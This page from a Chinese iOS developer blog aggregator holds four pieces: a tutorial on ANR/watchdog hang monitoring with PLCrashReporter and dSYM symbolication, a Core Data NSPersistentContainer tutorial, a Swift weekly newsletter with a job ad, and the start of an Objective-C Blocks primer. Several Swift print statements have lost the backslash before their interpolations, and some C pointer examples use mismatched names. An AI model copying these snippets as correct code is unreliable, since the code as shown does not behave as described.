阅读视图

发现新文章,点击刷新页面。

抖音思路复刻:iOS 卡死(ANR)监控 + 自动符号化全流程实战

在 iOS 上,App 在启动 / 退出 / 响应系统事件等关键阶段如果长时间卡住,超过系统阈值就会触发保护机制,最终被 Watchdog 以 SIGKILL 强制终止。这类异常的共同特点是:不是进程内异常抛出,而是“进程外指令”直接结束进程,因此传统基于 signal/exception 的崩溃捕获往往覆盖不到,也就导致它在生产环境中经常“只见数据、不见堆栈”,长期被忽视。

为了解决这个盲区,我选择站在巨人的肩膀上:本文实践并复现字节跳动团队的文章《iOS 稳定性问题治理:卡死崩溃监控原理及最佳实践》,从 原理 → 代码实现 → 候选文件保存 → dSYM/atos/脚本符号化 + Swift demangle,把一整套卡死(ANR/Watchdog)监控链路完整跑通,并沉淀成一个可复用 Demo。

文末给出完整代码链接


1. 痛点:卡死最难的不是“知道卡”,而是“知道卡在哪”

线上卡死/假死常见现象:

  • UI 不响应(点击无反应、滑动卡住),几秒后恢复或被系统杀掉
  • Crash 日志没有(不是进程内 crash),只剩用户反馈:“刚刚卡住了”
  • 拿到的堆栈是一堆 0x00000001.... 地址:不符号化就等于没有结论

所以要解决这类问题,本质是两件事:

  1. 卡死当下抓到主线程堆栈(或卡死期间持续采样)
  2. 自动符号化:把地址变成可读函数名,并尽可能 demangle Swift 符号

2. 原理:RunLoop 心跳 + 超阈值采样 = 还原卡死现场

2.1 监控“主线程卡死”的本质

主线程 RunLoop 正常情况下会不断在这些状态间流转:

  • BeforeTimers
  • BeforeSources
  • BeforeWaiting
  • AfterWaiting

当主线程执行重任务(大解析 / 同步 IO / 复杂布局 / 锁等待等),RunLoop 会长期卡在某个阶段不动,表现为 UI 无响应。

2.2 本 Demo 的检测策略(尽量向“抖音方案”靠拢)

Demo 采用的策略(参数对齐你当前实现):

  • 阈值:8 秒hangThreshold = 8
  • 检测周期:1 秒窗口tickInterval = 1
  • 超过阈值后:每秒采样一次主线程栈(从 Live Report 中提取 Thread 0
  • 最多保留 10 帧样本maxMainThreadSamples = 10,保留最近 10 次)

这套策略的意义是:
先判断“已经卡死到足够严重”(接近 Watchdog 风险),再进入“持续采样”,避免把轻微卡顿也当成卡死去抓栈/写文件。


3. Demo 实现结构

3.1 项目目录骨架

LagMonitorDemo/
├── LagMonitorDemo.xcodeproj
├── Sources/
│   └── Monitor/
│      ├── HMDANRMonitor.swift
│      ├── HMDLiveReportCapture.swift
│      ├── HMDANRRecord.swift
│      ├── HMDANRCandidateStore.swift
│      └── HMDDebugCacheCleaner.swift
├── Scripts/
│   └── hmd_anr_symbolicate.py
└── Samples/
    ├── hmd_anr_candidate.json
    └── symbolicated.txt

3.2 Monitor:HMDANRMonitor.swift(核心监控器)

3.2.1 监控目标

  • 主线程装 CFRunLoopObserver,每次回调认为 RunLoop 推进:heartbeat += 1
  • 监控线程用 1 秒观察窗口检查 heartbeat 是否变化
    • 1 秒内有推进:健康/恢复,清理候选
    • 1 秒内无推进:认为卡住,hangSeconds += 1
  • 卡住累计达到 8 秒阈值:创建 candidate
  • 超阈值后仍未恢复:每秒采样一次主线程栈,最多 10 帧

3.2.2 为什么看起来“没 sleep 1 秒”,却实现了“每秒检查一次”?

核心就在这一句:

_ = wakeSemaphore.wait(timeout: .now() + .seconds(config.tickInterval))

它等价于:

  • 最多等待 1 秒tickInterval = 1)作为一个观察窗口
  • 如果期间 RunLoop 有推进,observer 会 signal() → 监控线程会提前醒来
  • 窗口结束后比较 heartbeat:若 1 秒内完全没变,才算这一秒“卡住”

所以这里不是“固定每秒到点触发一次”,而是:

“最多等 1 秒,但只要 RunLoop 一推进就立刻醒来重置状态”
这比 Timer 的“固定周期触发”更贴合我们想观察的对象(RunLoop 推进)。

3.2.3 为什么不用 NSTimer / GCD 定时器,而用信号量?

Timer 触发本身就依赖调度与 RunLoop/线程状态,卡死时最容易抖动或延迟;信号量 + 超时是更稳定的“观察窗口”,还能被 RunLoop 推进即时唤醒。


3.3 抓栈:HMDLiveReportCapture.swift(PLCrashReporter Live Report)

抓栈使用 PLCrashReporter 的 Live Report 能力:

  • generateLiveReportAndReturnError():生成“当下全线程现场”
  • 再从文本中提取 Thread 0 作为主线程样本
import CrashReporter

/// 抓一次“全线程现场报告”
static func captureAllThreadsText() -> String? {
    let config = PLCrashReporterConfig(signalHandlerType: .BSD, symbolicationStrategy: .all)
    guard let reporter = PLCrashReporter(configuration: config) else { return nil }

    do {
        let data = try reporter.generateLiveReportAndReturnError()
        let report = try PLCrashReport(data: data)
        return PLCrashReportTextFormatter.stringValue(for: report, with: PLCrashReportTextFormatiOS)
    } catch {
        print("[HMDLiveReportCapture] parse report error: \(error)")
        return nil
    }
}

这里的思路就是:
卡死现场抓“全线程”,用于兜底;超阈值后持续采“主线程”,用于定位稳定卡点。


3.4 保存:HMDANRCandidateStore.swift(hmd_anr_candidate.json)

Demo 保存的核心数据结构是 HMDANRRecord,通过 Codable 编码为 JSON:

public struct HMDANRRecord: Codable {
    public let recordID: String
    public let timestamp: Date
    public var hangSeconds: Int

    /// 超过阈值那一刻:全线程现场(PLCrash live report,文本)
    public var allThreadsReportText: String?

    /// 超阈值后:每秒采样主线程调用栈(最多保留最近 N 条)
    public var mainThreadSamples: [String]
}

保存到 Caches/hmd_anr_candidate.json 后,大致字段长这样:

{
  "recordID": "E2D0...-....",
  "timestamp": "2026-01-05T12:34:56Z",
  "hangSeconds": 9,
  "allThreadsReportText": "PLCrashReporter live report text ...",
  "mainThreadSamples": [
    "Thread 0 ...\n0 LagMonitorDemo 0x...\n1 UIKitCore ...",
    "Thread 0 ...\n0 LagMonitorDemo 0x...\n1 UIKitCore ..."
  ]
}

HMDANRCandidateStore卡住时把记录保存到缓存文件;一旦主线程恢复推进就立刻删除;如果进程被系统强杀来不及上报,这个文件会留到下次启动再读取导出/符号化。


4. 复现场景(Demo 内置)

Demo 里包含几种典型卡死触发方式:

stack.addArrangedSubview(makeButton("主线程 Busy 2s(轻微卡顿)") { [weak self] in self?.busy(seconds: 2) })
stack.addArrangedSubview(makeButton("主线程 Busy 20s(触发 candidate + 采样)") { [weak self] in self?.busy(seconds: 20) })
stack.addArrangedSubview(makeButton("锁竞争:子线程持锁 12s → 主线程尝试加锁") { [weak self] in self?.lockContention() })
stack.addArrangedSubview(makeButton("死锁:串行队列 sync + 主队列 sync(必卡死)") { [weak self] in self?.deadlock() })

5. 自动符号化:从 hmd_anr_candidate.json 到“可读堆栈”

我点击 “主线程 Busy 20s(触发 candidate + 采样)”,在第 10 秒手动杀掉 App,然后导出沙盒里的 hmd_anr_candidate.json

你会看到类似信息:

  • hangSeconds = 13(很明确的主线程长时间阻塞)
  • mainThreadSamples 有多次采样(证明卡住期间栈稳定)
  • 但这些堆栈仍然是地址/偏移,无法直接定位业务代码

1.jpg

因此需要做:

  • hmd_anr_candidate.json 里解析 frame
  • dSYM + atos 还原符号;并对 Swift 符号 demangle$s... → Foundation.Date.init()

本项目用脚本 hmd_anr_symbolicate.py 自动完成批量符号化:

python3 hmd_anr_symbolicate.py   --record hmd_anr_candidate.json   --app-dsym LagMonitorDemo.app.dSYM   --arch arm64   --demangle   --out symbolicated.txt

符号化后的symbolicated.txt的大致内容如下:

2.jpg

hmd_anr_symbolicate.pyGITHUB项目的Scripts文件夹下,hmd_anr_candidate.jsonsymbolicated.txt在Samples文件下

5.1 符号化后如何“从栈定位问题”?

symbolicated.txt 里抽 mainThreadSamples[0] 的关键几帧(你这次 5 次采样基本一致):

1   libsystem_c.dylib          gettimeofday
3   Foundation                 Date.init
4   LagMonitorDemo.debug.dylib ... (ViewController.swift:52)
5   LagMonitorDemo.debug.dylib ... (ViewController.swift:33)
6   LagMonitorDemo.debug.dylib ... (ViewController.swift:44)
7   UIKitCore                  ...

这说明卡死期间主线程一直在跑 ViewController.swift 的某段逻辑,并且频繁调用 Date()(最终落到 gettimeofday/clock_gettime),典型特征就是忙等/死循环式等待

对应 Demo 中的实现:

private func busy(seconds: Int) {
    let end = Date().addingTimeInterval(TimeInterval(seconds))
    while Date() < end {
        _ = 1 + 1
    }
}

这类栈顶常见现象就是:看起来“卡在 Date()”,其实根因是 while 循环让主线程一直跑
采样刚好截在 Date() 这一行,于是栈顶表现为 Date.init -> gettimeofday


6. 结语:复刻的意义,是把“文章里的方案”变成“项目里能用的工具”

大厂的稳定性方案往往更深、更体系化,但很多时候只停留在文章层面:看懂了思路,却很难在项目里直接落地。本文的目标就是把它“拆开 + 跑通”:

  • 把抖音文章里的链路拆成可运行代码(监控、采样、保存、恢复、导出)
  • 把最后一公里补齐(dSYM/atos 自动符号化 + Swift demangle)
  • 让“卡死问题”从 只有 SIGKILL 数字,变成 能指向具体业务函数/代码行 的结论

你真正需要的不是“我们检测到了卡死”,而是:

卡死那 8~20 秒内,主线程到底在跑什么?它卡在谁身上?

当你把“采样 + 保存 + 下次启动捞取 + 自动符号化 + demangle”这条链路跑通,线上卡死排查效率会明显提升。


GITHUB源码

Core Data 简化开发:NSPersistentContainer 从原理到实战

作为 iOS/macOS 开发者,本地数据存储是绕不开的话题。提起 Core Data,不少新手会皱眉头 —— 早期的 Core Data 配置繁琐,手动管理上下文、协调器这些组件很容易踩坑;而老开发者则清楚,自从 Apple 推出NSPersistentContainer后,Core Data 的使用体验直接 “起飞”。今天就跟大家聊聊,这个 “容器” 到底是什么、怎么用,以及它的那些优缺点。

一、先唠唠 Core Data 的 “老痛点”

在 iOS 10/macOS 10.12 之前,想用 Core Data 得手动搭一套 “流水线”:

  1. 加载NSManagedObjectModel(数据模型);
  2. 创建NSPersistentStoreCoordinator(持久化存储协调器),指定存储类型(比如 SQLite)和路径;
  3. 实例化NSManagedObjectContext(托管对象上下文),并关联协调器;
  4. 还要处理线程安全、上下文合并这些问题。

一套操作下来,代码又长又容易出错,光是初始化就能劝退一半新手。Apple 显然也发现了这个问题,于是NSPersistentContainer应运而生 —— 它把 Core Data 的核心组件全 “打包” 了,让我们不用再关心底层细节,专注于业务逻辑即可。

二、NSPersistentContainer:Core Data 的 “一站式工具箱”

1. 核心原理:封装了什么?

NSPersistentContainer本质是对 Core Data 三大核心组件的封装,相当于给我们准备了一个开箱即用的 “数据管理容器”,内部结构如下:

组件 作用 容器中的访问方式
NSManagedObjectModel 定义数据结构(对应.xcdatamodeld 文件) container.managedObjectModel
NSPersistentStoreCoordinator 管理数据存储(比如 SQLite 文件) container.persistentStoreCoordinator
NSManagedObjectContext 操作数据的 “工作台”(增删改查) container.viewContext(主线程)/container.newBackgroundContext()(后台)

简单说:你只需要告诉容器 “数据模型叫什么名字”,它会自动完成模型加载、协调器创建、上下文关联等所有底层工作,不用写一行冗余代码。

2. 最核心的两个上下文

容器里最常用的是两个上下文,一定要分清:

  • viewContext:默认绑定主线程,专门用于 UI 相关的操作(比如列表展示读书笔记),线程安全,直接用就行;
  • newBackgroundContext() :每次调用都会生成一个新的后台上下文,用于耗时操作(比如批量导入历史读书笔记),避免阻塞主线程导致 UI 卡顿。

三、实战:NSPersistentContainer 的基本用法

光说不练假把式,我们用一个简单的 “读书笔记管理” 示例,看看怎么用容器搞定 Core Data 的增删改查。

前置准备

  1. 创建 iOS 项目时勾选「Use Core Data」(Xcode 会自动生成基础的容器代码);

  2. 打开.xcdatamodeld文件,创建一个BookNote实体,添加三个属性:

    • bookName(String,书名);
    • content(String,笔记内容);
    • createTime(Date,创建时间,默认值可设为@now)。

1. 初始化容器(Xcode 自动生成,稍作优化)

AppDelegate 中的核心代码,我们优化下错误处理(别用 fatalError,实际项目要友好):

import UIKit
import CoreData

@UIApplicationMain
class AppDelegate: UIResponder, UIApplicationDelegate {
    // 懒加载持久化容器
    lazy var persistentContainer: NSPersistentContainer = {
        // 模型文件名要和.xcdatamodeld文件名称一致(比如我命名为BookNoteModel)
        let container = NSPersistentContainer(name: "BookNoteModel") 
        
        // 加载持久化存储(默认是SQLite文件,存储在App沙盒中)
        container.loadPersistentStores(completionHandler: { (storeDescription, error) in
            if let error = error as NSError? {
                // 实际项目中替换为日志/弹窗提示,别直接崩溃
                print("Core Data加载失败:(error.localizedDescription)")
            }
        })
        return container
    }()

    // 封装保存上下文的方法,复用性更高
    func saveContext() {
        let context = persistentContainer.viewContext
        guard context.hasChanges else { return } // 没有修改就不保存,减少IO消耗
        
        do {
            try context.save()
            print("读书笔记保存成功✅")
        } catch {
            print("保存失败❌:(error.localizedDescription)")
        }
    }
}

2. 增删改查实战(ViewController 中)

import UIKit
import CoreData

class ViewController: UIViewController {
    // 获取容器(实际项目建议用单例/依赖注入,别直接强转AppDelegate,这里为了简化)
    private var container: NSPersistentContainer {
        let appDelegate = UIApplication.shared.delegate as! AppDelegate
        return appDelegate.persistentContainer
    }

    // 1. 添加读书笔记
    @IBAction func addBookNote(_ sender: UIButton) {
        let context = container.viewContext
        // 创建BookNote对象
        let note = BookNote(context: context)
        note.bookName = "《小王子》"
        note.content = "正是你为你的玫瑰花费的时光,才使你的玫瑰变得如此重要。"
        note.createTime = Date() // 也可以依赖模型的默认值,这里手动赋值更直观
        
        // 调用AppDelegate的保存方法
        (UIApplication.shared.delegate as! AppDelegate).saveContext()
    }

    // 2. 查询所有读书笔记(可按创建时间倒序)
    func fetchAllBookNotes() {
        let context = container.viewContext
        // 创建查询请求
        let fetchRequest: NSFetchRequest<BookNote> = BookNote.fetchRequest()
        
        // 按创建时间倒序排列,最新的笔记在前面
        let sortDescriptor = NSSortDescriptor(keyPath: \BookNote.createTime, ascending: false)
        fetchRequest.sortDescriptors = [sortDescriptor]
        
        do {
            let notes = try context.fetch(fetchRequest)
            notes.forEach { note in
                print("📚 书名:(note.bookName ?? "未知")")
                print("✍️ 笔记:(note.content ?? "无内容")")
                print("🕒 创建时间:(note.createTime ?? Date())\n")
            }
        } catch {
            print("查询读书笔记失败:(error.localizedDescription)")
        }
    }

    // 3. 删除读书笔记(示例:删除第一条《小王子》的笔记)
    @IBAction func deleteBookNote(_ sender: UIButton) {
        let context = container.viewContext
        let fetchRequest: NSFetchRequest<BookNote> = BookNote.fetchRequest()
        
        // 增加筛选条件:只删《小王子》的笔记
        fetchRequest.predicate = NSPredicate(format: "bookName == %@", "《小王子》")
        
        do {
            if let targetNote = try context.fetch(fetchRequest).first {
                context.delete(targetNote) // 删除指定笔记对象
                (UIApplication.shared.delegate as! AppDelegate).saveContext()
                print("《小王子》的笔记已删除")
            }
        } catch {
            print("删除读书笔记失败:(error.localizedDescription)")
        }
    }

    // 4. 后台批量导入读书笔记(重点:用后台上下文,不卡UI)
    func batchImportBookNotes() {
        // 创建后台上下文
        let backgroundContext = container.newBackgroundContext()
        // 设置合并策略,避免多上下文操作冲突
        backgroundContext.mergePolicy = NSMergeByPropertyObjectTrumpMergePolicy
        
        // 在后台线程执行批量操作,不会阻塞主线程
        backgroundContext.perform { [weak self] in
            // 模拟批量导入3本经典书籍的笔记
            let noteDatas = [
                ("《百年孤独》", "生命中真正重要的不是你遭遇了什么,而是你记住了哪些事,又是如何铭记的。"),
                ("《解忧杂货店》", "其实所有纠结做选择的人心里早就有了答案,咨询只是想得到内心所倾向的选择。"),
                ("《活着》", "人是为了活着本身而活着的,而不是为了活着之外的任何事物而活着。")
            ]
            
            // 循环创建笔记对象
            for (bookName, content) in noteDatas {
                let note = BookNote(context: backgroundContext)
                note.bookName = bookName
                note.content = content
                note.createTime = Date()
            }
            
            // 保存后台上下文的修改
            do {
                try backgroundContext.save()
                print("批量导入读书笔记完成✅")
            } catch {
                print("批量导入失败❌:(error.localizedDescription)")
            }
        }
    }
}

小提示

  • 别在主线程做批量导入 / 大量查询操作!一定要用newBackgroundContext()
  • 后台上下文的perform方法会自动在对应的后台线程执行代码,不用手动写 GCD(比如DispatchQueue.global().async);
  • 实际项目中,建议把 Core Data 操作封装成单独的工具类(比如BookNoteManager),把增删改查的逻辑抽离出来,ViewController 只负责调用,代码更整洁易维护。

四、NSPersistentContainer 的优缺点

优点:新手友好,效率拉满

  1. 极大简化配置:不用手动管理模型、协调器、上下文的关联,几行代码就能初始化 Core Data;
  2. 线程安全viewContext默认绑定主线程,避免了新手最容易踩的 “线程混乱” 坑;
  3. 易于扩展:支持自定义存储路径、存储类型(比如内存存储,适合测试),满足进阶需求;
  4. 官方维护:Apple 持续优化,兼容性和稳定性有保障。

缺点:灵活度略有妥协

  1. 底层封装过深:新手可能只知其然不知其所以然,遇到复杂问题(比如跨版本数据迁移)时,排查起来比较费劲;
  2. 自定义配置稍麻烦:如果要修改默认的存储路径、缓存大小,需要额外写代码拆解容器;
  3. 不支持跨平台(纯 Swift) :Core Data 是 Apple 专属框架,如果你想做跨平台 App(比如 iOS+Android),还是得用 Realm、SQLite.swift 等。

五、最后聊聊:什么时候用 NSPersistentContainer?

  • 推荐用:绝大多数常规 App(比如读书笔记、备忘录、待办清单类),只需要本地存储数据,不需要复杂的自定义配置;
  • 谨慎用:如果你需要深度定制 Core Data 的底层(比如自定义存储协调器、复杂的数据迁移策略),可能需要结合底层 API 使用;
  • 📌 替代方案:如果追求跨平台 / 纯 Swift,可考虑 Realm、GRDB.swift;如果数据量极小,直接用 UserDefaults 就行。

总结

  1. NSPersistentContainer是 Apple 为简化 Core Data 开发推出的 “利器”,封装了 Core Data 的核心组件,iOS 10 + 可直接用;
  2. 核心用法:初始化容器→用viewContext处理 UI 相关操作(比如展示读书笔记)→用newBackgroundContext()处理后台耗时操作(比如批量导入)→保存上下文;
  3. 它的优点是简单、安全、高效,缺点是底层封装过深,灵活度略有妥协,适合绝大多数常规 iOS/macOS 项目。

Core Data 看似复杂,但有了NSPersistentContainer这个 “帮手”,新手也能快速上手。与其纠结底层原理,不如先动手写起来,遇到问题再深入研究,毕竟实践才是最好的老师~


关键点回顾

  1. 示例场景替换为「读书笔记管理」,实体BookNote包含bookName(书名)、content(笔记内容)、createTime(创建时间)三个核心属性;
  2. 核心代码逻辑不变,但所有增删改查、批量导入的操作都围绕 “读书笔记” 展开,更贴近日常开发场景;
  3. 保留了原博客轻松的语气和完整的讲解结构,同时补充了排序、筛选等更实用的查询技巧。

2026:当 AI 隐入工作流,你准备好了吗? -- 肘子的 Swift 周报 #117

issue117.webp

2026:当 AI 隐入工作流,你准备好了吗?

大家新年好!在过去的几年中,AI 始终占据着科技界最耀眼的 C 位。但站在 2026 年的起点回看,我发现一个显著的转折:从 2025 年末开始,人们对“万亿参数”或“榜单跑分”的狂热逐渐褪去,取而代之的是对 AI 工作流深耕细作的冷静与实战。

如果说过去两年大多数人还在尝试如何与 Chat 机器人聊天,那么现在,AI 已经通过 CLI、MCP 以及各种 Slash、Skill、SubAgent,彻底打破了对话框的限制。对于有经验的开发者来说,AI 已经不再是一个外部工具,而是像插件一样,渗透进终端、编辑器乃至整个操作系统的每一个毛细血管。

在这一点上,macOS 展示了某种“无心插柳”的天然优势。借助 AppleScript 和快捷指令这些成熟的自动化工具,即便不通过复杂的 API 开发,普通用户也能让 AI 访问自己的私有数据。这种“老树发新芽”的现象,让苹果在 AI 时代拥有了新的护城河。而如果这种能力在 iOS 上通过系统级 Agent 完全释放,硬件设备的形态或许将迎来新一轮重塑。

与此同时,某些厂商的策略则更加“激进”。字节跳动的豆包手机尝试从系统底层通过屏幕读取与模拟交互来“暴力”接管一切;华为则通过 A2A(Agent to Agent)策略,试图在后台构建一套统一的代理调度机制。无论路线如何,2026 年对于普通消费者来说都标志着一个奇点的到来:AI 不再是聊天工具,而是显式或隐式地接管了我们的数字生活。

正如那句老话:当一个技术不再被反复提及,才说明它已真正融入生活,如同血液般不可或缺。

然而,越是无感,越要警惕。当 AI 深入工作流的每一个细节,隐私将成为最昂贵的奢侈品。在追求极致自动化与效率的同时,如何选择服务商、如何平衡本地与云端模型、如何保留最后一点象征性的“隐私”,将是我们在 2026 年必须面对的命题。

2026 来了,你开始将 AI 集成到自己的工作流中了吗?

本期内容 | 前一期内容 | 全部周报列表

🚀 《肘子的 Swift 周报》

每周为你精选最值得关注的 Swift、SwiftUI 技术动态

近期推荐

独立开发者的试炼:Zipic 从 0 到 1 的产品化之路

Zipic 是我一直在高频使用的图片压缩工具,我亲眼见证了这个应用如何从一个职场工作的小需求,逐渐在作者 十里 的不断打磨下成长为一个高效、精致、专注的成功产品。独立开发者往往意味着“一人成军”,时刻在策略、设计、开发、分发与推广之间来回切换。为了挖掘这背后的故事,我邀请了十里复盘了 Zipic 从 0 到 1 的全过程。全文共分三个篇章:产品设计(本文)、不依赖 Mac App Store 的分发与售卖 以及 技术细节复盘:SwiftUI 痛点与性能瓶颈


Swift vs. Rust:从内存管理的终极对决中学到的 5 个惊人事实

在开发者社区中,关于 Swift 和 Rust 性能的讨论从未停止。通常的看法是:Swift 因为自动引用计数(ARC)而相对较慢,而 Rust 则以其极致的速度和内存效率著称。但 Snow 认为,这种“快”与“慢”的简单标签往往掩盖了两者在设计哲学上的根本差异:Swift 优先开发体验和生态兼容,Rust 追求极致性能和编译时安全。

结合实际案例,文章揭示了五个真相:Rust 的所有权规则本质上是零开销的编译时工具;Swift 的真正性能包袱来自 Objective-C 兼容性而非 ARC 本身;ARC 的核心问题是性能的不可预测性;并发安全上 Swift 依赖运行时保护而 Rust 实现编译时保证;以及为何 Swift 无法“变成”Rust。


StoreKit 订阅实战指南 (StoreKit Subscriptions: A Practical Guide)

Mohammad Azam 基于多年 iOS 开发经验和真实案例,撰写了完整的 StoreKit 订阅实践教程。系列涵盖:变现模型选择(一次性购买、订阅、消耗型购买及混合策略)、付费墙策略对比(软/硬付费墙及订阅试用的权衡)、引导体验设计(从静态截图演进到 8 步交互式引导,让用户在付费前完成核心功能体验并建立情感投入)、以及完整的技术实现(App Store Connect 配置、StoreKit 集成、产品加载和购买流程的代码示例)。


Skip 2025 回顾与 2026 路线图 (Skip 2025 Retrospective and 2026 Roadmap)

在 2025 年,随着 Swift SDK for Android 在 swift.org 正式发布,Skip 通过 Skip Fuse 提供原生编译支持,解锁了数千个原生 Swift 包在 Android 上的使用。同时新增 NFC、Stripe、PostHog、Auth0、Socket.IO 等双平台框架。iOS 26 推出的 Liquid Glass 界面风格成为跨平台框架的试金石。Skip 因采用“完全原生”策略(iOS 上使用原生 SwiftUI,Android 上映射到 Jetpack Compose)而在第一天就自动支持新界面,无需重写或变通。在 2026 年 Skip 计划继续扩展集成框架、优化 Skip Fuse 工具链、提升性能和开发体验。


如何使用 Claude Code (How to use Claude Code)

这是一份 Khoa Pham 在高强度使用 Claude Code 数月后整理的实战指南。核心技巧包括各种不同模式的详细应用场景,尤其是如何合理使用 Extended Thinking 模式以避免浪费 Token。另外还涵盖了关键快捷键、上下文管理技巧、MCP 集成、VS Code 和 Chrome 扩展、GitHub Actions 集成、Git Worktrees 并行工作流、插件生态以及提示词最佳实践等众多内容。内容详实、具体、有针对性,并非简单的功能介绍手册。


App Store Connect API Webhook 串接|提升 iOS CI/CD 自动化效率与通知流程

苹果在 WWDC 2025 中发布了 App Store Connect API Webhook,支持构建状态、App 版本状态、TestFlight 反馈等事件的实时推送。Zhong Cheng 针对打包上传后传统 Polling 方式需等待约 20 分钟(GitHub Runner 浪费 $1.24/次)的痛点,详细介绍了如何在 CI/CD 中应用该能力,实现零等待成本;GitFlow 回 master 时机可精确对齐 App 实际发布时间;开发者权限受限时也能及时收到拒审通知。


使用 WendyOS 开发嵌入式 Linux 应用 (Setting up Embedded Linux with WendyOS)

WendyOS 是一个专为嵌入式设备设计的 Linux 发行版,用 Swift 编写,旨在将 iOS 开发的便捷性带到嵌入式领域。Joannis Orlandos 在本文中提供了完整上手教程:从安装 Homebrew 和 Wendy 工具、刷写 WendyOS 到树莓派/Jetson Orin Nano 等设备、通过 USB 连接设备、配置 WiFi、创建 Swift 项目(含 wendy.json 权限配置)到使用 VSCode 扩展进行远程调试(支持断点和状态检查)。适合想将 Swift 应用到嵌入式设备或 IoT 场景的开发者作为入门教程。

工具

Swift 并发:通俗易懂的学习指南 (Fucking Approachable Swift Concurrency)

这是一个由 Pedro Piñera 创建、基于 Matt Massicotte 的 Swift 并发理念整理的学习资源,用通俗易懂的方式解释 async/await、Task、Actor、Sendable 等核心概念。Pedro 通过 "Office Building(办公楼)" 这一场景,将 MainActor 比作前台、actor 比作部门办公室、await 比作敲门等待,帮助开发者建立直观的心智模型。 另外,还提供了一个适用于 AI 工具的 Skill.md 文件,方便开发者将上述并发实践直接嵌入到开发工作流的规则引擎中。


Dimillian's Skills - iOS/Swift 开发 AI Agent Skills 集合

Thomas Ricouard 创建的用于 iOS/Swift 开发的 Skills 仓库,包含六个专注于实际工作流的 AI Agent Skills。涵盖 App Store Changelog 生成(从 git history 自动生成发布说明)、iOS Debugger Agent(使用 XcodeBuildMCP 构建/调试 iOS 项目)、Swift Concurrency Expert(修复 Swift 6.2 并发问题)、SwiftUI Liquid Glass(实现 iOS 26+ Liquid Glass API)、SwiftUI View Refactor(重构视图结构和依赖模式)、SwiftUI Performance Audit(审查性能瓶颈并提供优化建议)等。


StoreKit Helper - SwiftUI 应用内购买封装库

jaywcjlove开发的轻量级 StoreKit 2 封装库,专为 SwiftUI 设计,大幅简化应用内购买实现。相比直接使用 StoreKit 2 API,StoreKitHelper 减少了约 70% 的样板代码,特别适合需要快速集成应用内购买且不想处理底层复杂性的 SwiftUI 开发者。

核心特性包括:基于 @ObservableObject 的状态管理、协议驱动的类型安全产品定义、实时交易监听和自动状态更新、内置的 StoreKitHelperViewStoreKitHelperSelectionView UI 组件。通过 hasNotPurchased/hasPurchased 属性可以轻松控制界面显示,支持链式 API 配置购买弹窗的各种回调。

求贤

Mac OS 工程师

Photon 正在构建开源基础设施,帮助开发者将 AI Agent 带到人类已经熟悉的交互界面中,例如 iMessage、WhatsApp、电话通话、Discord、Signal 等。在此之上,我们还在打造以交互为核心的开源 Agent SDK,覆盖多段消息处理、消息线程处理、表情/回应(Tapbacks)等能力,让开发者和企业能够开发真正"像人一样"交流的 Agent。

职位要求

我们正在招聘 macOS 工程师,理想的候选人应具备以下条件:

  • 对 macOS 内部机制以及系统组件之间的交互有深入理解
  • 具备 macOS 系统分析与调试经验
  • 熟悉 macOS 系统级 API 及底层机制
  • 对探索 Apple 服务中的未知部分有好奇心
  • 加分项:有 iMessage、IMAgent 或相关消息基础设施的经验

薪资待遇

我们将提供具有竞争力的薪资(工作地点:美国,支持远程办公)。此外,Photon 获得多家知名投资机构的支持。

联系方式

ryan@photon.codes

这是朋友创业团队 Photon 的招聘。他们在做 AI Agent 在 iMessage/WhatsApp 等平台的基础设施,是个早期项目。如果你对 macOS 底层技术和早期创业机会感兴趣,可以了解一下。

往期内容

💝 支持与反馈

如果本期周报对你有帮助,请:

  • 👍 点赞 - 让更多开发者看到
  • 💬 评论 - 分享你的看法或问题
  • 🔄 转发 - 帮助同行共同成长

🚀 拓展 Swift 视野

【iOS老生常谈】-Blocks知多少

一、Block的概念

1、是什么Block

Block是带有局部变量的匿名函数。

iOS4引入,是对c语言的扩充功能,先来理解一下局部变量匿名函数的含义

1.1.局部变量

那带有局部变量又是什么意思? 先理解一下c语言的都有哪些变量

  • 自动变量(局部变量)
  • 函数的参数
  • 静态变量(静态局部变量)
  • 静态全局变量
  • 全局变量

每个变量的作用域不同。

int aa = 2; //全局变量
static int bb = 3; //静态全局变量
int main(int argc, const char * argv[]) { //argc 函数的参数
   int a = 1;  //auto修饰局部变量
   static int b = 1; //静态局部变量
   return 0;
}
变量 作用域 存储位置 生命周期 关键特性
全局 aa 整个程序(文件间) 全局数据区.data 程序全程 外部链接,多文件可访问
静态全局 bb 仅当前源文件 全局数据区.data 程序全程 内部链接,仅本文件可见
局部 a main 函数内 栈区 main 执行期间 自动销毁,每次调用重新初始化
静态局部 b main 函数内 全局数据区.data 程序全程 仅初始化一次,保留值
argc/argv main 函数内 栈区 main 执行期间 函数参数,栈上分配

1.2 匿名函数

所谓匿名函数,就是不带有函数名称的函数。

而在c语言中是不允许函数不带有名称的。

先理解一下c语言的函数定义:

int func(int count); //声明了名为func的函数,参数为int类型的count,返回值为int类型

调用func

int result = func(3);

使用函数指针funcPtr直接调用函数func,这种也是需要函数名才能通过函数指针调用。

int (*funPtr)(int) = &fun;
int result = (*funcPtr)(3);

二、Block的语法

2.1.Block的定义

官方文档:Blocks Programming Topics

//官方实例
int multiplier = 7;
int (^myBlock)(int) = ^(int num) {
    return num * multiplier;
};

image-20251219下午20836996

其中myBlock是声明的快对象,返回类型为int,myBlock 快对象有一个int类型的参数,myBlock的主体部分为 return num * multiplier;

上面表达式的特点:

  • 没有函数名 (匿名函数)
  • 带有^ ,插入记号,便于查找。

Block的表达式: ^返回值类型(参数列表){表达式}

^int (int count){ return count +1 };

Block可以省略如返回值,参数列表,如果用不到的话

  • 省略返回值类型

    //省略返回值类型:^(参数列表){表达式};
    ^(int count){return count+1};
    
  • 省参数列表

    ^int (void){ return  1};
    ^int {return  1};
    
  • 省略返回值类型、参数列表:

    ^{  }; //最简洁的block
    

2.2.Block类型的变量

通过Block语法将Block赋值为Block类型的变量

int (^blk) (int) = ^(int count) { return  count+1}; 

此时的表达式和c语言的指针函数表达式对比

int (*funPtr)(int) = &fun; //指针函数

block的变量声明就是把声明指针函数类型的* 变为^

  • 在函数参数中使用 Block类型的变量

    //作为函数参数的block变量
    void func(int (^blk)(int)){
        
    }
    
  • 作为函数的返回值

    int (^blk1(void))(int){
        return ^(int count){
          return count+1 ;
        };
    }
    //作为函数返回值时,需要注意:
    // 1. 调用 blk1 函数,并且是无参函数,它返回一个Block
    int (^myBlock)(int) = blk1();
    
    // 2. 调用(执行)这个返回的Block,并传入整数参数 5
    int result = myBlock(5);
    NSLog(@"结果是: %d", result); // 输出:结果是: 6
    

    上述当block作为参数或返回值时,可以通过typedef声明类型,来简化,如下

